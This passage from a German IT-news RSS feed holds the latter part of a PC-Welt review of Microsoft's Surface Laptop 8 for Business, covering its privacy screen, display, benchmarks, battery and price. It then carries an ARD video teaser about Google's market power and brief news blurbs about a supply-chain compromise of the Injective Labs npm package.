<p>Aus dieser Perspektive scheint der Blickschutz kaum eine Wirkung zu entfalten. Ich habe mir dabei vorgestellt, wie es aus dem Blickwinkel einer Person aussehen würde, die auf einem Gangplatz im Flugzeug sitzt und beiläufig zu meinem Sitz über den Gang hinweg blickt. Aus dieser Perspektive glaube ich nicht wirklich, dass der Blickschutz von Microsoft wirklich funktioniert.</p>



<p>Aus einem anderen Blickwinkel betrachtet sind die Ergebnisse aber gar nicht so schlecht. Es wäre hilfreich gewesen, wenn Microsoft genau mitgeteilt hätte, in welchen Situationen der Blickschutz am wirksamsten arbeitet. In einem abgedunkelten Flugzeug, bei eingeschalteter Deckenbeleuchtung? In einem relativ hellen Raum wie meinem Büro?</p>



<p>In einem schlechter beleuchteten Raum schien der Blickschutz wirksamer zu arbeiten. Aber sollten Sie wirklich Ihre Arbeitsbedingungen anpassen müssen, um von dieser Funktion zu profitieren?</p>



<p>Zudem ist mir eine leichte Fleckbildung auf dem Display aufgefallen, die aussieht wie ein schwacher, staubiger Schleier im Displayglas. Ich vermute, dass dies an der Beschaffenheit des Sichtschutzglases selbst liegt.</p>



<p>Vielleicht wurden hierfür einige der Pixel leicht versetzt? Das Ergebnis ist jedoch deutlich sichtbar: Eine weiße Webseite wirkt bei direkter Betrachtung leicht staubig. Dies ist nicht störend oder ablenkend, aber es war auffällig.</p>



<p>Was die Ein- und Ausgänge betrifft, ist die Ausstattung des Surface Laptop 8 for Business recht übersichtlich: An der linken Seite befinden sich zwei Thunderbolt-4-/USB-C-Anschlüsse, über die mit dem entsprechenden Dock drei 4K-Displays mit 60 Hertz betrieben werden können.</p>



<p>Die Anordnung sorgt jedoch dafür, dass ein Nutzer, der die Maus mit der linken Hand bedient, sich den Platz mit den Displaykabeln teilen muss. Außerdem gibt es einen USB-A-Anschluss und eine Kopfhörerbuchse.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.06.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195221" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Auf der rechten Seite befindet sich der Surface Connect-Anschluss, der beim kleineren Surface Laptop und beim neuen Surface Pro weggefallen ist. Das bedeutet, dass Sie das Gerät entweder mit so gut wie jedem handelsüblichen USB-C-Ladegerät oder mit dem mitgelieferten winzigen 60-Watt-Surface-Ladegerät wieder aufladen können.</p>



<p>Insgesamt wirkt das Design des Surface Laptop 8 for Business robust und gut verarbeitet. Es ist jedoch erwähnenswert, dass das Kühlsystem im Vergleich zu früheren Generationen gänzlich unverändert geblieben ist: Die Luft strömt durch Lüftungsgitter im Scharnier nach außen.</p>



<p>Selbst bei der Standardeinstellung des Laptops (Beste Energieeffizienz) musste ich nicht viel am Rechner tun, damit sich der Lüfter einschaltete. Unter Last war das Lüftergeräusch jedoch meist unauffällig.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.10.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195223" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Bildschirm</h2>



<p>Kurzum, mir gefällt der Bildschirm des Surface Laptop 8 for Business einfach nicht.</p>



<p>Auf dem Papier macht das Display noch einen guten Eindruck: Das HDR-Display bietet Dolby Vision IQ-Unterstützung mit adaptiver Farb- und Kontrastanpassung von bis zu 1300:1. Microsoft bietet zwei Anzeigemodi an: sRGB und „Vivid“. Der Hersteller gibt an, dass eine Helligkeit von bis zu 600 Nits erreicht werden kann. Ich habe insgesamt eine Leuchtdichte von 491 Nits gemessen, die jedoch bei aktiviertem Sichtschutz auf 163 Nits sank.</p>



<p>Der Farbraum ist recht gut und blieb sowohl bei aktiviertem als auch bei deaktiviertem Sichtschutz unverändert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.21.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195224" width="1024" height="631" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der Surface Laptop 8 for Business bietet ein Touch-Display. Dieses ist jedoch nur für die Bedienung mit dem Finger ausgelegt. Eine Eingabe per Stift wird nicht unterstützt. Das Display lässt sich ohnehin nicht vollständig zurückklappen, was die Verwendung eines Stifts schwer machen würde.</p>



<p>Was ich am Bildschirm besonders schätze, ist eine oft unterschätzte Funktion: Die variable Bildwiederholfrequenz reicht von 120 Hertz bis hinunter auf 24 Hertz. Das ist großartig. Das 120-Hertz-Display erhöht die Bildwiederholfrequenz, wenn Sie es aktiv nutzen. Dadurch werden Mausbewegungen oder Spiele mit einer höheren Bildwiederholfrequenz dargestellt, was zu flüssigeren Bewegungen führt.</p>



<p>Wenn Sie auf einen statischen Bildschirm schauen, sinkt die Bildwiederholfrequenz auf 24 Hertz – weniger als die herkömmlichen 60 Hertz. Das senkt den Stromverbrauch, ohne dass Sie es wirklich bemerken. Der Akku hält entsprechend länger durch.</p>



<p>Der Bildschirm wirkt allerdings etwas trüb, und es gibt eine leichte Fleckenbildung, die durch den Sichtschutz verursacht wird. Dies sorgt dafür, dass die Auflösung niedriger wirkt, als sie tatsächlich ist. Mit einer Kamera lässt sich dieses Manko nicht wirklich einfangen. Vielleicht bin ich durch die neue Generation von OLED-Displays auch einfach zu verwöhnt. Doch aus meiner Sicht lässt dieser Bildschirm einfach zu viele Wünsche offen.</p>



<h2 class="wp-block-heading">Ton und Mikrofone</h2>



<p>Microsofts Surface-Geräte gehörten zu den ersten Laptops, die mit ihrer Audioqualität überzeugen konnten. Daran hat sich nichts geändert. Die integrierten Omnisonic-Lautsprecher unterstützen Dolby Atmos und bieten mehr Lautstärke, als für einen kleinen Raum nötig wäre. Der Sound klang zwar etwas flacher, als ich ihn in Erinnerung hatte.</p>



<p>Dennoch benötigen Sie für diesen Laptop nicht unbedingt Kopfhörer. Die Audioqualität der verbauten Lautsprecher ist über den gesamten Frequenzbereich hinweg recht gut.</p>



<p>Die beiden Studio-Mikrofone sorgen für eine neue Funktion namens “Voice Focus“. Diese soll in bestimmten, aber nicht näher genannten Anwendungen unterstützt werden. Der Algorithmus konzentriert sich dabei auf Ihre Stimme und nicht auf Geräusche im Hintergrund. Um diese Funktion auszuprobieren, nahm ich meine Stimme mit der Windows-App “Sound Recorder” auf, während ich im Hintergrund Musik und weißes Rauschen abspielte.</p>



<p>Beide Hintergrundgeräusche blieben noch etwas hörbar. Das weiße Rauschen wurde deutlich besser herausgefiltert als der Gesang im Hintergrund. Hier wusste die Software einfach nicht, ob sie die abgespielte Musik beibehalten oder ausblenden sollte. Die meisten neuen Asus-Laptops bieten eine noch bessere Geräuschfilterung.</p>



<h2 class="wp-block-heading">Tastatur und Touchpad</h2>



<p>Die Tastatur gehörte einst auch zu den Aspekten, die ein Surface-Gerät ausgezeichnet haben. Mittlerweile haben die anderen Hersteller jedoch aufgeholt. Mir sind dennoch keine Mängel an der Tastatur des Surface Laptop 8 for Business aufgefallen. Sie ist nicht deutlich besser oder schlechter als andere gute Laptop-Tastaturen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.33.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195225" width="1024" height="722" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der neue Surface Laptop verfügt über die haptischen Touchpads, die Microsoft vor einigen Jahren eingeführt hat. Diese lassen sich über die gesamte Fläche anklicken. Dies ist im Vergleich zu herkömmlichen Touchpads ein echter Pluspunkt. Microsoft arbeitet zudem daran, ein subtiles haptisches Feedback auszulösen, wenn der Mauszeiger über bestimmte Bildschirmelemente bewegt wird, wie das “X” zum Schließen eines Fensters. Der Effekt ist sehr unauffällig, aber dennoch ein nettes kleines Detail.</p>



<p>Das Touchpad lässt sich zudem über die Surface-App anpassen. Diese war auf meinem Testgerät jedoch nicht vorinstalliert. Die App kann jedoch <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">kostenlos aus dem Microsoft Store</a> heruntergeladen werden. Mit der Software können Sie festlegen, welcher Bereich des Surface-Touchpads auf Rechts- und Linksklicks reagiert.</p>



<h2 class="wp-block-heading">Webcam</h2>



<p>Der Surface Laptop 8 for Business verfügt über eine 1080p-Kamera, die die Windows Studio-Effekte wie Hintergrundunschärfe, Bildausschnitt, Blickkontakt und mehr unterstützt. Außerdem bietet sie die Gesichtserkennung, einen wesentlichen Bestandteil der <a href="https://www.pcwelt.de/article/2480916/warum-sie-windows-hello-verwenden-sollten-um-ihren-pc-zu-sichern.html" target="_blank">Windows Hello-Technologie</a>. Während des Testzeitraums hatte ich keinerlei Probleme mit der Anmeldung über die Kamera.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.53.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195226" width="1024" height="596" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Da es sich um eine “Business”-Kamera handelt, erwartet man von der Webcam eine professionelle Darstellung unter verschiedenen Lichtverhältnissen. Und unter der hellen LED-Beleuchtung meines Büros funktioniert dies auch gut.</p>



<p>Hier habe ich die Webcam sowohl im hellen Licht unseres Büros als auch bei natürlicherer Beleuchtung in meiner Wohnung getestet.</p>



<p>Offen gestanden war ich von den Ergebnissen nicht sonderlich beeindruckt. Bei natürlicher Beleuchtung (der Himmel war an diesem Tag bewölkt) schnitt die Webcam recht gut ab, obwohl das Bild körniger war, als ich es erwartet hätte. Im Büro wirkte das Bild der Kamera jedoch etwas blass.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.01.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195227" width="1024" height="564" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Leistung</h2>



<p>Derzeit zählt der Intel Core Ultra 300 (<a href="https://www.pcwelt.de/article/2937427/intel-panther-lake-laptop-cpu.html?gad_source=1&amp;gad_campaignid=23842067659&amp;gclid=Cj0KCQjwi8nRBhDhARIsAHZf_pb7YWtNKos2TT2Azmce-HO0WHiai6SycmExhDbngIoE4SM7zBW4V3gaAs7_EALw_wcB" target="_blank">Panther Lake</a>) zu den besten Premium-Laptop-Prozessoren, die Sie im Jahr 2026 kaufen können. Den kürzlich vorgestellten AMD Ryzen AI 400-Prozessor konnten wir noch nicht in einem marktreifen Laptop finden.</p>



<p>Bislang durften wir Panther Lake jedoch nur in größeren Produktivitäts-Laptops mit überlegenen Kühlungslösungen wie dem <a href="https://www.pcwelt.de/article/3025832/die-10-besten-laptops-der-ces-2026.html" target="_blank">Asus ZenBook Duo</a> ausprobieren. Zum besseren Verständnis: Läuft ein Laptop über einen längeren Zeitraum unter hoher Last, kann sich die Performance durch Drosselung reduzieren. Auf diese Weise soll eine gefährliche Überhitzung verhindert werden. Im Fall des Surface Laptop 8 ist dies ein Punkt, auf den Sie besonders achten sollten.</p>



<p>Der Cinebench-2024-CPU-Benchmark umfasst einen “Thermal-Throttling”-Test. Dabei wird der Benchmark wiederholt über einen Zeitraum von zehn Minuten ausgeführt. In diesem Szenario ist eine verminderte Leistung ein Hinweis auf thermische Drosselung. Sie können dann einen einzelnen Durchlauf mit dem Langzeittest vergleichen. So kann festgestellt werden, ob eine Drosselung auftritt. In unserem Fall sank die CPU-Leistung bei einem Vergleich von 773 auf 689 Punkte.</p>



<p>Mit dem 3DMark-Grafiktest lässt sich ebenfalls ein Langzeittest durchführen – in diesem Fall zwanzig Benchmark-Durchläufe – und die Leistung im Verlauf des Tests vergleichen. Hier war der Unterschied noch größer.</p>



<p>Der Benchmark erzielte beim ersten Durchlauf die höchste Punktzahl, fiel dann bei den nachfolgenden Durchläufen auf etwa die Hälfte der Leistung ab und verblieb während der folgenden Testläufe auf diesem Niveau.</p>



<p>Was sagt uns das? In gewisser Weise sind Leistungswerte oft irreführend. Der Surface Laptop 8 funktioniert am zuverlässigsten in kurzen, intensiven Phasen, zumindest was das Gaming betrifft.</p>



<p>Für längere Sitzungen ist das Gerät weniger gut geeignet. Andererseits scheint die Kühlung für CPU-intensive Aufgaben auszureichen. Zu diesen Aufgaben zählen unter anderem das Betriebssystem, das Komprimieren und Dekomprimieren von Dateien sowie allgemeine Anwendungen ohne viele visuelle Elemente. Beachten Sie, dass wir zwar die NPU-Fähigkeiten des Laptops nicht testen, er sich mit seinen 50 TOPS jedoch als <a href="https://www.pcwelt.de/article/2819676/copilot-pc-lohnt-sich-der-kauf-eines-ki-rechners-das-mussen-sie-wissen.html" target="_blank">Copilot-PC</a> qualifiziert.</p>



<p>Ich habe den Surface Laptop 8 for Business mit mehreren 14-Zoll-Laptops der jüngsten Generation verglichen: dem <a href="https://www.pcwelt.de/article/2479359/acer-swift-14-ai-laptop-test.html" target="_blank">Acer Swift X 14 AI</a> und dem verwandten Modell <a href="https://www.pcwelt.de/article/3048294/acer-swift-edge-14-ai-test.html" target="_blank">Acer Swift Edge 14 AI</a>.</p>



<p>Hinzu kamen zwei Panther-Lake-Laptops: der <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">Dell XPS 14</a> und der <a href="https://www.pcwelt.de/article/3072282/msi-prestige-flip-14-ai-test.html" target="_blank">MSI Prestige Flip 14 AI</a>. Schließlich habe ich noch zwei Snapdragon-Laptops hinzugefügt: den <a href="https://www.pcwelt.de/article/2380548/surface-laptop-7-test-eine-neue-ara-fur-windows-laptops.html" target="_blank">Surface Laptop 7</a> (2024) mit einem Snapdragon X1 Elite-Chip der ersten Generation sowie den <a href="https://www.pcwelt.de/article/2403490/lenovo-yoga-slim-7x-test.html" target="_blank">Lenovo Yoga Slim 7x Gen 11</a>, der mit einem Snapdragon X2 Elite Extreme-Chip der zweiten Generation ausgestattet ist.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.14.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195228" width="1024" height="588" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der PCMark-10-Test deckt ein breites Spektrum ab, das von Videoanrufen über das Surfen im Internet hin zu CAD-Anwendungen und einigen weniger anspruchsvollen Spielen reicht.</p>



<p>Aufgrund der Vielfalt der getesteten Anwendungen ist dieser Benchmark nach wie vor relevant. Der Surface Laptop profitiert ein wenig von seiner leistungsstarken integrierten GPU, obwohl es sich hierbei in erster Linie um CPU-orientierte Tests handelt.</p>



<p>Für andere Tests, die sich nicht mit PCMark messen lassen, verwenden wir stattdessen Cinebench 2024. Obwohl es eine Version für 2026 gibt, nutzen wir aus Kompatibilitätsgründen weiterhin Cinebench 2024. Auch hier gilt: Panther Lake ist eine leistungsstarke CPU, die bei kurzer Spitzenlast eine hohe Leistung bietet.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.25.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195229" width="1024" height="475" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Dieser ausgedehnte Cinebench-Stresstest verdeutlicht jedoch, dass Sie bei längerer Nutzung mit einer geringeren CPU-Leistung rechnen müssen.</p>



<p>Handbrake war ursprünglich der Test, mit dem wir bewerteten, wie gut sich der Laptop und sein Prozessor über einen längeren Zeitraum behaupten können. Die App selbst ist nützlich, auch wenn sie schon älter ist.</p>



<p>Sie transkodiert lediglich eine Videodatei in ein Format, das für die Speicherung auf einem Tablet verwendet wird. Angesichts der Verbreitung von Streaming-Apps findet diese Transkodierung mittlerweile meist im Hintergrund statt. Dennoch ist sie ein wirksames Maß für die dauerhafte CPU-Leistung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.36.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195230" width="1024" height="436" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Unser traditioneller Maßstab für die 3D-Leistung ist der “Time Spy”-Benchmark von 3DMark. Dieser misst die 3D-Leistung auf eine Weise, die ein echtes 3D-Spiel simuliert. Auch hier würde ich erwarten, dass der Surface Laptop recht gut abschneidet – und das tut er auch.</p>



<p>Allerdings sind mir bei den von diesem Laptop gemeldeten Ergebnissen einige übermäßige Schwankungen aufgefallen. Nach einem Kaltstart stiegen die Benchmark-Ergebnisse auf einen Höchstwert von 7.063. Im niedrigsten Fall sank das Ergebnis auf 4.601. Nach jedem Durchlauf ließ ich den Laptop zehn Minuten lang abkühlen.</p>



<p>Bei diesem Gerät zeigen die Ergebnisse jedoch einen deutlichen Unterschied zwischen der Durchführung des Benchmarks zu Beginn des Tages und der Durchführung nach einer Abkühlphase von zehn Minuten im Anschluss an eine Reihe anderer Benchmarks. Dies ist ein ungewöhnliches Verhalten und ein echter Minuspunkt. Ich gehe einfach immer davon aus, dass ein hochwertiger Laptop eine konstante Leistung abliefern kann.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.44.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195231" width="1024" height="351" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Da es sich beim Surface Laptop 8 um ein Produktivitätsgerät handelt, habe ich ihn im Hinblick auf Gaming nicht ausgiebig getestet. Allerdings machen Intels XeSS-Upscaling und die Frame-Generierung einen enormen Unterschied.</p>



<p>“Cyberpunk: 2077”, getestet bei einer Auflösung von 1.920 × 1.080 Pixeln und der Einstellung „Low“, erzielte mit der reinen Render-Engine des Spiels eine durchschnittliche Bildrate von 50 Bildern pro Sekunde. Das ist ein schon relativ gut spielbares Ergebnis. Mit aktivierten Zusatzfunktionen stieg die Bildrate jedoch auf 133 Bilder pro Sekunde – was mehr als spielbar ist.</p>



<p>Bitte beachten Sie, dass der Benchmark nur etwa eine Minute lang läuft. Daher ist bei längerem Spielen mit einem Rückgang der Bildrate zu rechnen.</p>



<p>Bei einem Produktivitäts-Laptop lege ich Wert auf außergewöhnliche Leistung. Aber die Akkulaufzeit ist ebenso wichtig. Einige der ersten Panther-Lake-Laptops, die ich getestet habe, verfügten über riesige 99-Wattstunden-Akkus – das zulässige Maximum in Flugzeugen.</p>



<p>Um das Gewicht gering zu halten, lieferte Microsoft den Surface Laptop 8 for Business mit einem 52-Wattstunden-Akku aus. Das wirkt sich natürlich auf die Akkulaufzeit aus, wenn auch nicht dramatisch. Es macht mir keine Sorgen, dass ich für eine Akkulaufzeit von 17,3 Stunden etwas weniger Gewicht mit mir herumschleppen muss. Bei produktiver Arbeit könnte die Laufzeit aber etwas niedriger ausfallen als in unseren Tests.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.52.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195232" width="1024" height="415" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Preis und Verfügbarkeit</h2>



<p>Zum Zeitpunkt der Veröffentlichung ist der Surface Laptop 8 for Business <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">nur bei Microsoft selbst</a> und wenigen anderen Händlern erhältlich. Der Einstiegspreis für das 13,8-Zoll-Modell liegt beim Hersteller bei 2.119 Euro. Dafür gibt es 16 Gigabyte RAM und 256 Gigabyte Speicherplatz. Mit 512-Gigabyte-SSD klettert der Preis auf 2.239 Euro.</p>



<p>Optional ist für ausgewählte 13,8-Zoll-Konfigurationen der integrierte Privacy Screen erhältlich. Ob diese Variante in Deutschland verfügbar ist, geht aus dem Microsoft Store derzeit nicht eindeutig hervor. Als Option steht der Blickschutz bei der Konfiguration noch nicht zur Verfügung.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Würde man den Preis um etwa 1.000 Euro senken, dann ließe sich der Kauf des aktuellen Surface Laptop 8 for Business eher rechtfertigen. So ist dieser Laptop aber einfach viel zu teuer, um ihn zu empfehlen – selbst für die geschäftliche Nutzung.</p>



<p>Es ist erwähnenswert, dass die Laptops, mit denen wir den Surface Laptop primär vergleichen, auch erst kürzlich ausgeliefert wurden. Dadurch sind auch diese Geräte ebenfalls von den Kostensteigerungen bei Arbeitsspeicher und SSD-Speicher betroffen.</p>



<p>Bietet der Surface Laptop ansonsten etwas Überzeugendes? Abgesehen vom Blickschutzbildschirm eigentlich nicht wirklich. Was Leistung und Akkulaufzeit angeht, so gibt es viele Laptops, die diese Werte bei deutlich geringeren Anschaffungskosten sogar übertreffen.</p>



<p>Tatsächlich wirkt diese Generation der Surface-Laptops etwas unentschlossen. Privatkunden würden wahrscheinlich eine etwas leistungsstärkere Grafikeinheit für Spiele bevorzugen, während Geschäftsreisende eher auf eine starke CPU-Leistung Wert legen dürften. Das werden wir wahrscheinlich beim kommenden Surface Laptop für Privatkunden sehen, der vermutlich mit einem Qualcomm Snapdragon X2 Elite-Chip ausgestattet sein wird. Die Akkulaufzeit dürfte in etwa gleich bleiben.</p>



<p>Ich habe das Gefühl, dass ich bereits ausreichend Worte über diesen Laptop verloren habe. Er ist überteuert. Kaufen Sie ihn nicht.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li><strong>Prozessor: Core </strong>Ultra 5 335, Core Ultra 7 366H, Core Ultra X7 368H (getestet: 368H)</li>



<li><strong>Display:</strong> 13,8 Zoll (2.304 × 1.536 Pixel) PixelSense Flow, 24–120 Hertz, Dolby Vision, entspiegelt nach ISO-9241 oder blendfrei mit integriertem Blickschutz (getestet)</li>



<li><strong>Arbeitsspeicher:</strong> 16 Gigabyte/32 Gigabyte/64 Gigabyte LPDDR5X (getestet: 16 Gigabyte)</li>



<li><strong>Speicher:</strong> 256 Gigabyte/512 Gigabyte/1 Terabyte PCIe Gen 4 M.2 NVMe SSD (getestet: 512 Gigabyte)</li>



<li><strong>Grafikkarte:</strong> Iris Arc B390</li>



<li><strong>NPU:</strong> 50 TOPS</li>



<li><strong>Anschlüsse:</strong> 2 × USB-C/Thunderbolt 4, USB-A, 3,5-Millimeter-Kopfhöreranschluss, Surface Connect-Anschluss</li>



<li><strong>Sicherheit:</strong> Windows Hello-Kamera</li>



<li><strong>Kamera: </strong>1080p<strong> </strong>(zum Benutzer gerichtet, Windows Hello)</li>



<li><strong>Akku:</strong> Nennkapazität: 52,3 Wattstunden, tatsächliche Kapazität laut Test: 54,1 Wattstunden</li>



<li><strong>Drahtlos:</strong> Wi-Fi 7, Bluetooth Core 5.4</li>



<li><strong>Audio:</strong> Zwei Studio-Mikrofone, Omnisonic-Lautsprecher mit Dolby Atmos</li>



<li><strong>Betriebssystem:</strong> Windows 11 Pro</li>



<li><strong>Abmessungen:</strong> 301 Millimeter x 220 Millimeter x 17,5 Millimeter</li>



<li><strong>Gewicht:</strong> 1,35 Kilogramm</li>



<li><strong>Farben:</strong> Platin und Mattschwarz</li>



<li><strong>Preise:</strong> ab 2.119 Euro (Testmodell: 2.239 Euro)</li>
</ul>



<p>(<a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html" data-type="link" data-id="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So abhängig sind wir von Google | Die Wahrheit über… ARD]]></title>
<description><![CDATA[Author: ARD Marktcheck - Bewertung: 579x - Views:22517 Wie hat Google es geschafft, unseren digitalen Alltag so stark zu dominieren – und welche Auswirkungen hat das auf Unternehmen und letztendlich uns alle? 

Von Google Maps, über die Google Suche, bis hin zu Google Shopping – wir schauen uns d...]]></description>
<link>https://tsecurity.de/de/3661125/it-security-nachrichten/so-abhaengig-sind-wir-von-google-die-wahrheit-ueber-ard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661125/it-security-nachrichten/so-abhaengig-sind-wir-von-google-die-wahrheit-ueber-ard/</guid>
<pubDate>Sat, 11 Jul 2026 04:38:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: ARD Marktcheck - Bewertung: 579x - Views:22517 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/z0yPJ5LPK3Q?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Wie hat Google es geschafft, unseren digitalen Alltag so stark zu dominieren – und welche Auswirkungen hat das auf Unternehmen und letztendlich uns alle? <br />
<br />
Von Google Maps, über die Google Suche, bis hin zu Google Shopping – wir schauen uns den Internet-Giganten genau an und beleuchten die Schattenseiten seiner großen Marktmacht. <br />
<br />
Schaut rein - am Donnerstag um 17 Uhr an dieser Stelle 👀<br />
<br />
📢 Wie steht ihr zu Google? Schreibt es in die Kommentare! <br />
<br />
👋 WILLKOMMEN BEI "Die Wahrheit über…“!  <br />
Bestimmt kennt ihr schon die spannenden Verbrauchertipps von den Kolleginnen und Kollegen vom SWR Marktcheck, Markt NDR und Markt WDR, rbb supermarkt, ECHT?, FYI – Unsere Recherche, Dein Vorteil, 50K, Eine Minute Geld und BUY BETTER. <br />
<br />
„Die Wahrheit über…“ deckt auf, welche Tricks hinter verlockenden Rabatten, beliebten Produkten und Serviceversprechen stecken. Mit verdeckten Recherchen, spannenden Einblicken und verblüffenden Erkenntnissen schaut das Format hinter die Kulissen der Unternehmen, die uns ständig im Verbraucheralltag begegnen und zeigt, wie Kunden clever handeln und sparen können.<br />
<br />
---------------------<br />
► Mehr aktuelle Infos auf unserer Homepage: https://marktcheck.ard.de  <br />
► Mehr praktische Alltagstipps und Tricks auf unserer Facebook-Seite:  https://facebook.com/ard.marktcheck<br />
► Wir freuen uns auf eure Kommentare – aber bitte unter Beachtung der Netiquette: https://www.swr.de/home/netiquette-100.html   <br />
► Unser Impressum: https://www.swr.de/impressum/ <br />
► Unsere Datenschutzerklärung: https://www.swr.de/datenschutz<br />
<br />
#google #googlemaps #ustech<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Injective Labs GitHub Compromise Pushes Wallet-Key-Stealing npm Packages]]></title>
<description><![CDATA[Unknown threat actors compromised the Injective Labs SDK project’s GitHub repository and leveraged it to publish a malicious package on the npm registry to steal cryptocurrency wallet private keys and mnemonic seed phrases. The compromised version, @injectivelabs/sdk-ts@1.20.21, came embedded wit...]]></description>
<link>https://tsecurity.de/de/3660560/it-security-nachrichten/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660560/it-security-nachrichten/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/</guid>
<pubDate>Fri, 10 Jul 2026 20:08:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Unknown threat actors compromised the Injective Labs SDK project’s GitHub repository and leveraged it to publish a malicious package on the npm registry to steal cryptocurrency wallet private keys and mnemonic seed phrases. The compromised version, @injectivelabs/sdk-ts@1.20.21, came embedded with…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/">Injective Labs GitHub Compromise Pushes Wallet-Key-Stealing npm Packages</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Injective Labs GitHub Compromise Pushes Wallet-Key-Stealing npm Packages]]></title>
<description><![CDATA[Unknown threat actors compromised the Injective Labs SDK project's GitHub repository and leveraged it to publish a malicious package on the npm registry to steal cryptocurrency wallet private keys and mnemonic seed phrases.

